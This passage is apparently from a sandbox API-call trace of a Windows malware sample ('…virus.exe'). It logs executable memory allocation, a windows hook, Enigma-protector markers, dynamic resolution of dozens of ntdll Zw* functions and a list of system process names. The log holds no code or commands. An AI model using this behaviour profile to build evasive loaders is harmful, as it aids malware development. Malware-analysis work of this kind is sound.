lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe")) returned 0x45 [0067.738] OemToCharA (in: pSrc="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", pDst=0x28fd87 | out: pDst="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned 1 [0068.056] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x2c0000 [0068.057] GetKeyboardLayoutList (in: nBuff=64, lpList=0x28fd08 | out: lpList=0x28fd08) returned 1 [0068.428] GetModuleHandleA (lpModuleName="USER32") returned 0x75980000 [0068.428] GetProcAddress (hModule=0x75980000, lpProcName="AnimateWindow") returned 0x759ab531 [0068.609] SysReAllocStringLen (in: pbstr=0x54d844*=0x0, psz="Help", len=0x4 | out: pbstr=0x54d844*="Help") returned 1 [0068.609] SysReAllocStringLen (in: pbstr=0x54d840*=0x0, psz="YesToAll", len=0x8 | out: pbstr=0x54d840*="YesToAll") returned 1 [0068.610] SysReAllocStringLen (in: pbstr=0x54d83c*=0x0, psz="NoToAll", len=0x7 | out: pbstr=0x54d83c*="NoToAll") returned 1 [0068.610] SysReAllocStringLen (in: pbstr=0x54d838*=0x0, psz="All", len=0x3 | out: pbstr=0x54d838*="All") returned 1 [0068.610] SysReAllocStringLen (in: pbstr=0x54d834*=0x0, psz="Ignore", len=0x6 | out: pbstr=0x54d834*="Ignore") returned 1 [0068.610] SysReAllocStringLen (in: pbstr=0x54d830*=0x0, psz="Retry", len=0x5 | out: pbstr=0x54d830*="Retry") returned 1 [0068.610] SysReAllocStringLen (in: pbstr=0x54d82c*=0x0, psz="Abort", len=0x5 | out: pbstr=0x54d82c*="Abort") returned 1 [0068.610] SysReAllocStringLen (in: pbstr=0x54d828*=0x0, psz="Cancel", len=0x6 | out: pbstr=0x54d828*="Cancel") returned 1 [0068.610] SysReAllocStringLen (in: pbstr=0x54d824*=0x0, psz="OK", len=0x2 | out: pbstr=0x54d824*="OK") returned 1 [0068.610] SysReAllocStringLen (in: pbstr=0x54d820*=0x0, psz="No", len=0x2 | out: pbstr=0x54d820*="No") returned 1 [0068.610] SysReAllocStringLen (in: pbstr=0x54d81c*=0x0, psz="Yes", len=0x3 | out: pbstr=0x54d81c*="Yes") returned 1 [0068.663] GetTickCount () returned 0x1d01fc8 [0068.663] GetTickCount () returned 0x1d01fc8 [0068.663] GetCurrentThreadId () returned 0xf38 [0068.663] SetWindowsHookExW (idHook=3, lpfn=0x4e67b8, hmod=0x0, dwThreadId=0xf38) returned 0x900d9 [0068.778] RegisterClipboardFormatA (lpszFormat="TntUnicodeVcl.DestroyWindow") returned 0xc109 [0068.778] VirtualQuery (in: lpAddress=0x4ce37c, lpBuffer=0x28fe64, dwLength=0x1c | out: lpBuffer=0x28fe64*(BaseAddress=0x4ce000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x6fc000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0068.779] GetCurrentProcessId () returned 0xf34 [0068.779] GetCurrentThreadId () returned 0xf38 [0068.779] GlobalAddAtomA (lpString="EnigmaDelphi00000F34") returned 0xc166 [0068.779] GlobalAddAtomA (lpString="EnigmaControlOfs0040000000000F38") returned 0xc165 [0068.989] LoadCursorA (hInstance=0x0, lpCursorName=0x7f89) returned 0x1001f [0068.989] DestroyCursor (hCursor=0x0) returned 0 [0069.050] QueryPerformanceCounter (in: lpPerformanceCount=0x28fecc | out: lpPerformanceCount=0x28fecc*=3054987809358) returned 1 [0069.153] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xd0 [0069.153] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xd4 [0069.533] GetLastError () returned 0x0 [0069.534] SetLastError (dwErrCode=0x0) [0069.603] GetLastError () returned 0x0 [0069.604] SetLastError (dwErrCode=0x0) [0069.604] GetLastError () returned 0x0 [0069.604] SetLastError (dwErrCode=0x0) [0069.604] GetLastError () returned 0x0 [0069.604] SetLastError (dwErrCode=0x0) [0069.604] GetLastError () returned 0x0 [0069.604] SetLastError (dwErrCode=0x0) [0069.672] GetLastError () returned 0x0 [0069.672] SetLastError (dwErrCode=0x0) [0069.672] GetLastError () returned 0x0 [0069.672] SetLastError (dwErrCode=0x0) [0069.673] GetLastError () returned 0x0 [0069.673] SetLastError (dwErrCode=0x0) [0069.673] GetLastError () returned 0x0 [0069.673] SetLastError (dwErrCode=0x0) [0069.673] GetLastError () returned 0x0 [0069.673] SetLastError (dwErrCode=0x0) [0069.673] GetLastError () returned 0x0 [0069.673] SetLastError (dwErrCode=0x0) [0069.673] GetLastError () returned 0x0 [0069.673] SetLastError (dwErrCode=0x0) [0069.745] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0069.745] GetLastError () returned 0x0 [0069.745] SetLastError (dwErrCode=0x0) [0069.745] GetLastError () returned 0x0 [0069.745] SetLastError (dwErrCode=0x0) [0069.745] GetLastError () returned 0x0 [0069.745] SetLastError (dwErrCode=0x0) [0069.745] GetLastError () returned 0x0 [0069.745] SetLastError (dwErrCode=0x0) [0069.745] GetLastError () returned 0x0 [0069.745] SetLastError (dwErrCode=0x0) [0069.745] GetLastError () returned 0x0 [0069.745] SetLastError (dwErrCode=0x0) [0069.806] GetLastError () returned 0x0 [0069.807] SetLastError (dwErrCode=0x0) [0069.807] GetLastError () returned 0x0 [0069.807] SetLastError (dwErrCode=0x0) [0069.807] GetLastError () returned 0x0 [0069.807] SetLastError (dwErrCode=0x0) [0069.807] GetLastError () returned 0x0 [0069.807] SetLastError (dwErrCode=0x0) [0069.807] GetLastError () returned 0x0 [0069.807] SetLastError (dwErrCode=0x0) [0069.807] GetLastError () returned 0x0 [0069.808] SetLastError (dwErrCode=0x0) [0069.808] GetLastError () returned 0x0 [0069.808] SetLastError (dwErrCode=0x0) [0069.856] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x3c0000 [0069.856] GetLastError () returned 0x0 [0069.856] SetLastError (dwErrCode=0x0) [0069.856] GetLastError () returned 0x0 [0069.856] SetLastError (dwErrCode=0x0) [0069.856] GetLastError () returned 0x0 [0069.857] SetLastError (dwErrCode=0x0) [0069.857] GetLastError () returned 0x0 [0069.857] SetLastError (dwErrCode=0x0) [0069.910] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0069.910] GetLastError () returned 0x0 [0069.910] SetLastError (dwErrCode=0x0) [0069.910] GetLastError () returned 0x0 [0069.910] SetLastError (dwErrCode=0x0) [0069.910] GetLastError () returned 0x0 [0069.910] SetLastError (dwErrCode=0x0) [0069.910] GetLastError () returned 0x0 [0069.910] SetLastError (dwErrCode=0x0) [0069.959] GetProcAddress (hModule=0x75a80000, lpProcName="GetProcAddress") returned 0x75a91222 [0069.959] GetLastError () returned 0x0 [0069.959] SetLastError (dwErrCode=0x0) [0069.959] GetLastError () returned 0x0 [0069.959] SetLastError (dwErrCode=0x0) [0069.959] GetLastError () returned 0x0 [0069.959] SetLastError (dwErrCode=0x0) [0069.959] GetLastError () returned 0x0 [0069.960] SetLastError (dwErrCode=0x0) [0070.007] GetLastError () returned 0x0 [0070.007] SetLastError (dwErrCode=0x0) [0070.007] GetLastError () returned 0x0 [0070.007] SetLastError (dwErrCode=0x0) [0070.007] GetLastError () returned 0x0 [0070.008] SetLastError (dwErrCode=0x0) [0070.008] GetLastError () returned 0x0 [0070.008] SetLastError (dwErrCode=0x0) [0070.008] GetLastError () returned 0x0 [0070.008] SetLastError (dwErrCode=0x0) [0070.008] GetLastError () returned 0x0 [0070.008] SetLastError (dwErrCode=0x0) [0070.008] GetLastError () returned 0x0 [0070.008] SetLastError (dwErrCode=0x0) [0070.056] GetLastError () returned 0x0 [0070.056] SetLastError (dwErrCode=0x0) [0070.056] GetLastError () returned 0x0 [0070.056] SetLastError (dwErrCode=0x0) [0070.056] GetLastError () returned 0x0 [0070.056] SetLastError (dwErrCode=0x0) [0070.056] GetLastError () returned 0x0 [0070.056] SetLastError (dwErrCode=0x0) [0070.056] GetLastError () returned 0x0 [0070.057] SetLastError (dwErrCode=0x0) [0070.057] GetLastError () returned 0x0 [0070.057] SetLastError (dwErrCode=0x0) [0070.057] GetLastError () returned 0x0 [0070.057] SetLastError (dwErrCode=0x0) [0070.057] GetLastError () returned 0x0 [0070.057] SetLastError (dwErrCode=0x0) [0070.105] GetLastError () returned 0x0 [0070.105] SetLastError (dwErrCode=0x0) [0070.105] GetProcAddress (hModule=0x77a60000, lpProcName="ZwClose") returned 0x77a7f9d0 [0070.106] GetLastError () returned 0x0 [0070.106] SetLastError (dwErrCode=0x0) [0070.153] GetLastError () returned 0x0 [0070.153] SetLastError (dwErrCode=0x0) [0070.153] GetLastError () returned 0x0 [0070.154] SetLastError (dwErrCode=0x0) [0070.154] GetLastError () returned 0x0 [0070.154] SetLastError (dwErrCode=0x0) [0070.154] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateFile") returned 0x77a800a4 [0070.154] GetProcAddress (hModule=0x77a60000, lpProcName="ZwOpenFile") returned 0x77a7fd54 [0070.154] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateSection") returned 0x77a7ff94 [0070.154] GetProcAddress (hModule=0x77a60000, lpProcName="ZwMapViewOfSection") returned 0x77a7fc40 [0070.154] GetProcAddress (hModule=0x77a60000, lpProcName="ZwUnmapViewOfSection") returned 0x77a7fc70 [0070.154] GetProcAddress (hModule=0x77a60000, lpProcName="ZwUnmapViewOfSectionEx") returned 0x0 [0070.155] GetProcAddress (hModule=0x77a60000, lpProcName="ZwReadFile") returned 0x77a7f8e0 [0070.155] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryInformationFile") returned 0x77a7fa00 [0070.155] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetInformationFile") returned 0x77a7fc28 [0070.155] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryAttributesFile") returned 0x77a7fe4c [0070.155] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQuerySection") returned 0x77a80040 [0070.155] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryFullAttributesFile") returned 0x77a8132c [0070.155] GetProcAddress (hModule=0x77a60000, lpProcName="ZwWriteFile") returned 0x77a7f918 [0070.155] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDeviceIoControlFile") returned 0x77a7f8fc [0070.156] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetInformationObject") returned 0x77a80154 [0070.156] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryObject") returned 0x77a7f9e8 [0070.156] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryDirectoryFile") returned 0x77a7fd88 [0070.156] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryDirectoryFileEx") returned 0x0 [0070.156] GetProcAddress (hModule=0x77a60000, lpProcName="ZwOpenSection") returned 0x77a7fdb8 [0070.156] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDuplicateObject") returned 0x77a7fe34 [0070.156] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDeleteFile") returned 0x77a809d4 [0070.156] GetProcAddress (hModule=0x77a60000, lpProcName="ZwLockFile") returned 0x77a80e44 [0070.157] GetProcAddress (hModule=0x77a60000, lpProcName="ZwUnlockFile") returned 0x77a81ea8 [0070.157] GetProcAddress (hModule=0x77a60000, lpProcName="ZwTerminateProcess") returned 0x77a7fca0 [0070.157] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryVirtualMemory") returned 0x77a7fbc8 [0070.157] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryVolumeInformationFile") returned 0x77a7ff7c [0070.157] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetVolumeInformationFile") returned 0x77a81c8c [0070.157] GetProcAddress (hModule=0x77a60000, lpProcName="ZwAccessCheck") returned 0x77a80218 [0070.157] GetProcAddress (hModule=0x77a60000, lpProcName="ZwExtendSection") returned 0x77a80b0c [0070.157] GetProcAddress (hModule=0x77a60000, lpProcName="ZwFlushBuffersFile") returned 0x77a7ffac [0070.158] GetProcAddress (hModule=0x77a60000, lpProcName="ZwFsControlFile") returned 0x77a7fde8 [0070.158] GetProcAddress (hModule=0x77a60000, lpProcName="ZwNotifyChangeDirectoryFile") returned 0x77a80f48 [0070.158] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQuerySecurityObject") returned 0x77a81518 [0070.158] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetSecurityObject") returned 0x77a81b8c [0070.158] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateProcess") returned 0x77a80804 [0070.158] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateProcessEx") returned 0x77a7ffdc [0070.158] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateUserProcess") returned 0x77a8090c [0070.158] GetProcAddress (hModule=0x77a60000, lpProcName="ZwResumeThread") returned 0x77a80058 [0070.159] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateThread") returned 0x77a7fff4 [0070.159] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryInformationProcess") returned 0x77a7fac8 [0070.159] GetProcAddress (hModule=0x77a60000, lpProcName="ZwOpenKey") returned 0x77a7fa18 [0070.159] GetProcAddress (hModule=0x77a60000, lpProcName="ZwOpenKeyEx") returned 0x77a81008 [0070.159] GetProcAddress (hModule=0x77a60000, lpProcName="ZwEnumerateValueKey") returned 0x77a7fa30 [0070.159] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryKey") returned 0x77a7fa80 [0070.159] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryValueKey") returned 0x77a7fa98 [0070.159] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateKey") returned 0x77a7fb30 [0070.160] GetProcAddress (hModule=0x77a60000, lpProcName="ZwEnumerateKey") returned 0x77a7fd3c [0070.160] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetValueKey") returned 0x77a801b4 [0070.160] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDeleteKey") returned 0x77a809ec [0070.160] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDeleteValueKey") returned 0x77a80a34 [0070.160] GetProcAddress (hModule=0x77a60000, lpProcName="ZwFlushKey") returned 0x77a80b70 [0070.160] GetProcAddress (hModule=0x77a60000, lpProcName="ZwLoadKey") returned 0x77a80dfc [0070.160] GetProcAddress (hModule=0x77a60000, lpProcName="ZwLoadKey2") returned 0x77a80e14 [0070.160] GetProcAddress (hModule=0x77a60000, lpProcName="ZwNotifyChangeKey") returned 0x77a80f60 [0070.161] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryMultipleValueKey") returned 0x77a8146c [0070.161] GetProcAddress (hModule=0x77a60000, lpProcName="ZwReplaceKey") returned 0x77a81738 [0070.161] GetProcAddress (hModule=0x77a60000, lpProcName="ZwRestoreKey") returned 0x77a817d0 [0070.161] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSaveKey") returned 0x77a81864 [0070.161] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetInformationKey") returned 0x77a81a48 [0070.161] GetProcAddress (hModule=0x77a60000, lpProcName="ZwUnloadKey") returned 0x77a81e60 [0070.161] GetProcAddress (hModule=0x77a60000, lpProcName="ZwWaitForMultipleObjects") returned 0x77a80138 [0070.162] GetProcAddress (hModule=0x77a60000, lpProcName="ZwWaitForSingleObject") returned 0x77a7f8ac [0070.162] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCopyFileChunk") returned 0x0 [0070.162] GetLastError () returned 0x7f [0070.162] SetLastError (dwErrCode=0x7f) [0070.162] GetLastError () returned 0x7f [0070.162] SetLastError (dwErrCode=0x7f) [0070.162] GetLastError () returned 0x7f [0070.162] SetLastError (dwErrCode=0x7f) [0070.162] GetLastError () returned 0x7f [0070.162] SetLastError (dwErrCode=0x7f) [0070.210] VirtualFree (lpAddress=0x3c0000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0070.210] GetLastError () returned 0x7f [0070.210] SetLastError (dwErrCode=0x7f) [0070.210] GetLastError () returned 0x7f [0070.211] SetLastError (dwErrCode=0x7f) [0070.211] GetLastError () returned 0x7f [0070.211] SetLastError (dwErrCode=0x7f) [0070.211] GetLastError () returned 0x7f [0070.211] SetLastError (dwErrCode=0x7f) [0070.418] SysReAllocStringLen (in: pbstr=0x54e944*=0x0, psz="Registry", len=0x8 | out: pbstr=0x54e944*="Registry") returned 1 [0070.418] SysReAllocStringLen (in: pbstr=0x54e940*=0x0, psz="File", len=0x4 | out: pbstr=0x54e940*="File") returned 1 [0070.418] SysReAllocStringLen (in: pbstr=0x54dd3c*=0x0, psz="tcpsvcs.exe", len=0xb | out: pbstr=0x54dd3c*="tcpsvcs.exe") returned 1 [0070.418] SysReAllocStringLen (in: pbstr=0x54dd38*=0x0, psz="ntvdm.exe", len=0x9 | out: pbstr=0x54dd38*="ntvdm.exe") returned 1 [0070.418] SysReAllocStringLen (in: pbstr=0x54dd34*=0x0, psz="dllhost.exe", len=0xb | out: pbstr=0x54dd34*="dllhost.exe") returned 1 [0070.418] SysReAllocStringLen (in: pbstr=0x54dd30*=0x0, psz="replace.exe", len=0xb | out: pbstr=0x54dd30*="replace.exe") returned 1 [0070.419] SysReAllocStringLen (in: pbstr=0x54dd2c*=0x0, psz="regsvr32.exe", len=0xc | out: pbstr=0x54dd2c*="regsvr32.exe") returned 1 [0070.419] SysReAllocStringLen (in: pbstr=0x54dd28*=0x0, psz="winver.exe", len=0xa | out: pbstr=0x54dd28*="winver.exe") returned 1 [0070.419] SysReAllocStringLen (in: pbstr=0x54dd24*=0x0, psz="help.exe", len=0x8 | out: pbstr=0x54dd24*="help.exe") returned 1 [0070.419] SysReAllocStringLen (in: pbstr=0x54dd20*=0x0, psz="find.exe", len=0x8 | out: pbstr=0x54dd20*="find.exe") returned 1 [0070.419] SysReAllocStringLen (in: pbstr=0x54dd1c*=0x0, psz="compact.exe", len=0xb | out: pbstr=0x54dd1c*="compact.exe") returned 1 [0070.419] SysReAllocStringLen (in: pbstr=0x54dd18*=0x0, psz="chkdsk.exe", len=0xa | out: pbstr=0x54dd18*="chkdsk.exe") returned 1 [0070.419] SysReAllocStringLen (in: pbstr=0x54dd14*=0x0, psz="attrib.exe", len=0xa | out: pbstr=0x54dd14*="attrib.exe") returned 1 [0070.419] SysReAllocStringLen (in: pbstr=0x54dd10*=0x0, psz="write.exe", len=0x9 | out: pbstr=0x54dd10*="write.exe") returned 1 [0070.419] SysReAllocStringLen (in: pbstr=0x54dd0c*=0x0, psz="hh.exe", len=0x6 | out: pbstr=0x54dd0c*="hh.exe") returned 1 [0070.419] QueryPerformanceCounter (in: lpPerformanceCount=0x28fecc | out: lpPerformanceCount=0x28fecc*=3055124742938) returned 1 [0070.657] GetLastError () returned 0x0 [0070.657] SetLastError (dwErrCode=0x0) [0070.657] GetLastError () returned 0x0 [0070.657] SetLastError (dwErrCode=0x0) [0070.657] GetLastError () returned 0x0 [0070.657] SetLastError (dwErrCode=0x0) [0070.657] GetLastError () returned 0x0 [0070.657] SetLastError (dwErrCode=0x0) [0070.657] GetLastError () returned 0x0 [0070.657] SetLastError (dwErrCode=0x0) [0070.657] GetLastError () returned 0x0 [0070.657] SetLastError (dwErrCode=0x0) [0070.658] GetLastError () returned 0x0 [0070.658] SetLastError (dwErrCode=0x0) [0070.707] GetLastError () returned 0x0 [0070.707] SetLastError (dwErrCode=0x0) [0070.707] GetLastError () returned 0x0 [0070.707] SetLastError (dwErrCode=0x0) [0070.707] GetLastError () returned 0x0 [0070.707] SetLastError (dwErrCode=0x0) [0070.707] GetLastError () returned 0x0 [0070.707] SetLastError (dwErrCode=0x0) [0070.756] GetLastError () returned 0x0 [0070.756] SetLastError (dwErrCode=0x0) [0070.756] GetLastError () returned 0x0 [0070.756] SetLastError (dwErrCode=0x0) [0070.756] GetLastError () returned 0x0 [0070.756] SetLastError (dwErrCode=0x0) [0070.756] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0070.756] GetLastError () returned 0x0 [0070.757] SetLastError (dwErrCode=0x0) [0070.806] GetLastError () returned 0x0 [0070.806] SetLastError (dwErrCode=0x0) [0070.806] GetLastError () returned 0x0 [0070.806] SetLastError (dwErrCode=0x0) [0070.806] GetLastError () returned 0x0 [0070.806] SetLastError (dwErrCode=0x0) [0070.806] GetLastError () returned 0x0 [0070.806] SetLastError (dwErrCode=0x0) [0070.807] GetLastError () returned 0x0 [0070.807] SetLastError (dwErrCode=0x0) [0070.807] GetLastError () returned 0x0 [0070.807] SetLastError (dwErrCode=0x0) [0070.855] GetLastError () returned 0x0 [0070.856] SetLastError (dwErrCode=0x0) [0070.856] GetLastError () returned 0x0 [0070.856] SetLastError (dwErrCode=0x0) [0070.856] GetProcAddress (hModule=0x75a80000, lpProcName="GetModuleHandleA") returned 0x75a91245 [0070.856] GetLastError () returned 0x0 [0070.856] SetLastError (dwErrCode=0x0) [0070.905] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0070.905] GetProcAddress (hModule=0x75a80000, lpProcName="GetModuleHandleW") returned 0x75a93460 [0070.905] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0070.905] GetProcAddress (hModule=0x75a80000, lpProcName="CreateFileA") returned 0x75a9537e [0070.905] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0070.905] GetProcAddress (hModule=0x75a80000, lpProcName="CreateFileW") returned 0x75a93f0c [0070.905] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0070.906] GetProcAddress (hModule=0x75a80000, lpProcName="CreateFileMappingA") returned 0x75a954be [0070.906] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0070.906] GetProcAddress (hModule=0x75a80000, lpProcName="CreateFileMappingW") returned 0x75a918e9 [0070.906] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0070.906] GetProcAddress (hModule=0x75a80000, lpProcName="ReadFile") returned 0x75a93e83 [0070.906] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0070.906] GetProcAddress (hModule=0x75a80000, lpProcName="CloseHandle") returned 0x75a913f0 [0070.907] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0070.907] GetProcAddress (hModule=0x75a80000, lpProcName="GetFileSize") returned 0x75a9194e [0070.907] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0070.907] GetProcAddress (hModule=0x75a80000, lpProcName="SetFilePointer") returned 0x75a917b1 [0070.907] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0070.907] GetProcAddress (hModule=0x75a80000, lpProcName="MapViewOfFile") returned 0x75a918d1 [0070.907] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0070.907] GetProcAddress (hModule=0x75a80000, lpProcName="MapViewOfFileEx") returned 0x75a94c3b [0070.908] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0070.908] GetProcAddress (hModule=0x75a80000, lpProcName="UnmapViewOfFile") returned 0x75a91806 [0070.908] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0070.908] GetProcAddress (hModule=0x75a80000, lpProcName="LoadLibraryA") returned 0x75a9498f [0070.908] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0070.908] GetProcAddress (hModule=0x75a80000, lpProcName="LoadLibraryExA") returned 0x75a948cb [0070.908] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0070.909] GetProcAddress (hModule=0x75a80000, lpProcName="LoadLibraryW") returned 0x75a948e3 [0070.909] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0070.909] GetProcAddress (hModule=0x75a80000, lpProcName="LoadLibraryExW") returned 0x75a94915 [0070.909] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0070.909] GetProcAddress (hModule=0x75a80000, lpProcName="FreeLibrary") returned 0x75a93478 [0070.909] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0070.909] GetProcAddress (hModule=0x75a80000, lpProcName="FreeResource") returned 0x75aad3ab [0070.909] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0070.910] GetProcAddress (hModule=0x75a80000, lpProcName="GetVersion") returned 0x75a9441f [0070.910] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0070.910] GetProcAddress (hModule=0x75a80000, lpProcName="GetCurrentProcessId") returned 0x75a911f8 [0070.910] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0070.910] GetProcAddress (hModule=0x75a80000, lpProcName="GetCurrentProcess") returned 0x75a917e9 [0070.910] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0070.910] GetProcAddress (hModule=0x75a80000, lpProcName="GetCommandLineA") returned 0x75a95159 [0070.910] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0070.911] GetProcAddress (hModule=0x75a80000, lpProcName="GetCommandLineW") returned 0x75a951db [0070.911] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0070.911] GetProcAddress (hModule=0x75a80000, lpProcName="LockResource") returned 0x75a95911 [0070.911] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0070.911] GetProcAddress (hModule=0x75a80000, lpProcName="GetProcAddress") returned 0x75a91222 [0070.911] GetLastError () returned 0x0 [0070.911] SetLastError (dwErrCode=0x0) [0070.911] GetLastError () returned 0x0 [0070.911] SetLastError (dwErrCode=0x0) [0070.912] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0070.912] GetLastError () returned 0x0 [0070.912] SetLastError (dwErrCode=0x0) [0070.912] GetLastError () returned 0x0 [0070.912] SetLastError (dwErrCode=0x0) [0070.912] GetLastError () returned 0x0 [0070.912] SetLastError (dwErrCode=0x0) [0070.912] GetLastError () returned 0x0 [0070.912] SetLastError (dwErrCode=0x0) [0070.912] GetLastError () returned 0x0 [0070.912] SetLastError (dwErrCode=0x0) [0070.962] GetProcAddress (hModule=0x75a80000, lpProcName="UnhandledExceptionFilter") returned 0x75ab76f7 [0070.962] GetLastError () returned 0x0 [0070.962] SetLastError (dwErrCode=0x0) [0070.962] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0070.962] GetProcAddress (hModule=0x75a80000, lpProcName="DebugBreak") returned 0x75b14755 [0070.962] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0070.962] GetProcAddress (hModule=0x75a80000, lpProcName="FatalAppExitA") returned 0x75b14c31 [0070.963] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0070.963] GetProcAddress (hModule=0x75a80000, lpProcName="RtlRaiseException") returned 0x0 [0070.963] GetModuleHandleA (lpModuleName="user32.dll") returned 0x75980000 [0070.963] GetProcAddress (hModule=0x75980000, lpProcName="SetWindowsHookExA") returned 0x759a835c [0070.963] GetModuleHandleA (lpModuleName="user32.dll") returned 0x75980000 [0070.963] GetProcAddress (hModule=0x75980000, lpProcName="SetWindowsHookExW") returned 0x759a7603 [0070.963] GetModuleHandleA (lpModuleName="user32.dll") returned 0x75980000 [0070.963] GetProcAddress (hModule=0x75980000, lpProcName="UnhookWindowsHookEx") returned 0x759bf52b [0070.963] GetModuleHandleA (lpModuleName="user32.dll") returned 0x75980000 [0070.963] GetProcAddress (hModule=0x75980000, lpProcName="PeekMessageA") returned 0x759a5f74 [0070.964] GetModuleHandleA (lpModuleName="user32.dll") returned 0x75980000 [0070.964] GetProcAddress (hModule=0x75980000, lpProcName="CallNextHookEx") returned 0x759a6285 [0070.964] GetLastError () returned 0x7f [0070.964] SetLastError (dwErrCode=0x7f) [0071.459] HeapCreate (flOptions=0x0, dwInitialSize=0x88000, dwMaximumSize=0x88000) returned 0x36f0000 [0071.461] RtlAllocateHeap (HeapHandle=0x36f0000, Flags=0x0, Size=0x10000) returned 0x36f0590 [0071.461] RtlAllocateHeap (HeapHandle=0x36f0000, Flags=0x0, Size=0x10000) returned 0x3700598 [0071.461] RtlAllocateHeap (HeapHandle=0x36f0000, Flags=0x0, Size=0x10000) returned 0x37105a0 [0071.461] RtlAllocateHeap (HeapHandle=0x36f0000, Flags=0x0, Size=0x10000) returned 0x37205a8 [0071.462] RtlAllocateHeap (HeapHandle=0x36f0000, Flags=0x0, Size=0x10000) returned 0x37305b0 [0071.462] RtlAllocateHeap (HeapHandle=0x36f0000, Flags=0x0, Size=0x10000) returned 0x37405b8 [0071.462] RtlAllocateHeap (HeapHandle=0x36f0000, Flags=0x0, Size=0x10000) returned 0x37505c0 [0071.462] RtlAllocateHeap (HeapHandle=0x36f0000, Flags=0x0, Size=0x10000) returned 0x37605c8 [0071.592] GetLastError () returned 0x7f [0071.592] SetLastError (dwErrCode=0x7f) [0071.592] GetLastError () returned 0x7f [0071.593] SetLastError (dwErrCode=0x7f) [0071.593] GetLastError () returned 0x7f [0071.593] SetLastError (dwErrCode=0x7f) [0071.664] VirtualAlloc (lpAddress=0x32e4000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0x32e4000 [0071.666] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 